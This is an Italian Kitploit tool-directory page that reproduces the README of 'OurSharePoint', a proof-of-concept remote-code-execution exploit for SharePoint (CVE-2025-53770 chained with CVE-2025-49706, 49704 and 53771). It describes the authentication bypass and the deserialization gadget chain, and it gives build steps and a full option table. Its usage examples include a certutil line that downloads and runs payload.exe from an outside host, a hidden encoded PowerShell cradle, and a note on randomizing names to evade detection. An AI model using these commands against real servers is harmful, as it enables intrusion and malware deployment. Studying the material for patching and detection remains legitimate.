Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
OurSharePoint-CVE-2025-53770 — Pensi davvero che SharePoint sia sicuro? | Kitploit
Strumenti/GitHubGitHub/rabbitbong/oursharepoint-cve-2025-53770
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubrabbitbong/oursharepoint-cve-2025-53770

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

OurSharePoint-CVE-2025-53770

Pensi davvero che SharePoint sia sicuro?

Vedi Repository
215 mesi faNon ancora revisionato

OurSharePoint — CVE-2025-53770 PoC

Strumento RCE per SharePoint autonomo, unico binario. Genera una catena di gadget TypeConfuseDelegate come byte MS-NRBF grezzi (senza ysoserial.exe), la avvolge in un payload di deserializzazione DataSet e la consegna tramite HTTP utilizzando il bypass di autenticazione — tutto in un colpo solo.


Catena di attacco

StepCVEDescrizione
1CVE-2025-49706Bypass autenticazione — Referer: /_layouts/SignOut.aspx salta l'autenticazione di SharePoint
2CVE-2025-53771Bypass patch — il segmento di percorso finale dopo ToolPane.aspx elude la correzione di luglio 2025
3CVE-2025-49704Deserializzazione — ExcelDataSet.CompressedDataTable attiva BinaryFormatter su un DataSet appositamente creato
4—Lo schema di DataSet forza LosFormatter.Deserialize() sul payload interno tramite ExpandedWrapper + ObjectDataProvider
5—TypeConfuseDelegate — il comparatore di SortedSet<string> è Process.Start(string, string), eseguendo cmd /c <comando>

L'intero flusso binario (sia il wrapper DataSet esterno che il gadget TypeConfuseDelegate interno) è costruito come record MS-NRBF grezzi — non viene utilizzata la serializzazione runtime .NET. Ciò corrisponde al formato prodotto dal modulo Metasploit byte per byte.


Compilazione

Richiede .NET Framework 4.8 SDK (Visual Studio 2022 o Build Tools standalone):

root@kitploit:~
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release

Output: OurSharePoint\bin\Release\OurSharePoint.exe (file singolo, nessuna dipendenza)


Utilizzo

One-shot: preparazione ed esecuzione

root@kitploit:~
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com

Esecuzione semplice di un comando

root@kitploit:~
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com

Cradle PowerShell

root@kitploit:~
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com

Solo ricognizione (nessun payload)

root@kitploit:~
OurSharePoint.exe --target=https://sp.corp.com --check

Genera file payload offline

root@kitploit:~
OurSharePoint.exe --cmd="calc.exe" --out=exploit

Con proxy (Burp)

root@kitploit:~
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080

Legacy: payload esterno ysoserial.exe

root@kitploit:~
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com

Opzioni


File di output

Quando si usa --out, lo strumento scrive:

FileContenuto
<prefix>.binStream DataSet BinaryFormatter grezzo
<prefix>.b64Codificato GZip + Base64 (ciò che va in CompressedDataTable)

Versioni interessate

EdizioneIntervallo vulnerabile
SharePoint Server Subscription Edition16.0.14326.20450 – 16.0.18526.20424
SharePoint Server 201916.0.10337.12109 – 16.0.10417.20027
SharePoint Enterprise Server 201616.0.4351.1000 – 16.0.5508.1000
SharePoint Server 201315.0.4481.1005 – 15.0.5545.1000

Note di implementazione

  • Nessuna serializzazione runtime — Sia il wrapper DataSet che il gadget TypeConfuseDelegate sono scritti come record binari MS-NRBF grezzi utilizzando BinaryWriter. Ciò evita differenze tra l'output della serializzazione runtime .NET e ciò che il deserializzatore target si aspetta.
  • Struttura LosFormatter — Il gadget interno è avvolto con byte di intestazione ObjectStateFormatter (0xFF 0x01 0x32 + lunghezza a 7 bit) invece di usare LosFormatter.Serialize().
  • Binario singolo — Nessuno strumento esterno, DLL o script Python richiesti. Il .exe è completamente autonomo.
  • Randomizzazione — I prefissi dei tag XML e i nomi degli elementi DataSet sono randomizzati per ogni esecuzione per evitare il rilevamento basato su firme.

Riferimenti

  • Eye Security — SharePoint Under Siege
  • Metasploit PR #20409 — sharepoint_toolpane_rce
  • MS-NRBF Specification
  • pwntester/ysoserial.net — TypeConfuseDelegate
Scarica lo strumento
FlagDescrizioneDefault
--cmd=COMANDOComando da eseguire (viene eseguito come cmd /c COMANDO)—
--in=FILEFile payload LosFormatter pre-costruito in base64—
--target=URLURL base di SharePoint per la consegna HTTP—
--checkSolo impronta digitale versione, nessun payload—
--out=PREFIXPrefisso file di outputpayload
--sp-version=VERVersione percorso Layouts (15 o 16)15
--proxy=URLProxy HTTP—
--ua=STRINGUser-Agent personalizzatoFirefox 120
--referer=URLSostituisci Referer per bypass autenticazioneauto
--timeout=SECTimeout HTTP15
--a/b/c=NOMENomi DataSet/elemento/colonnarandom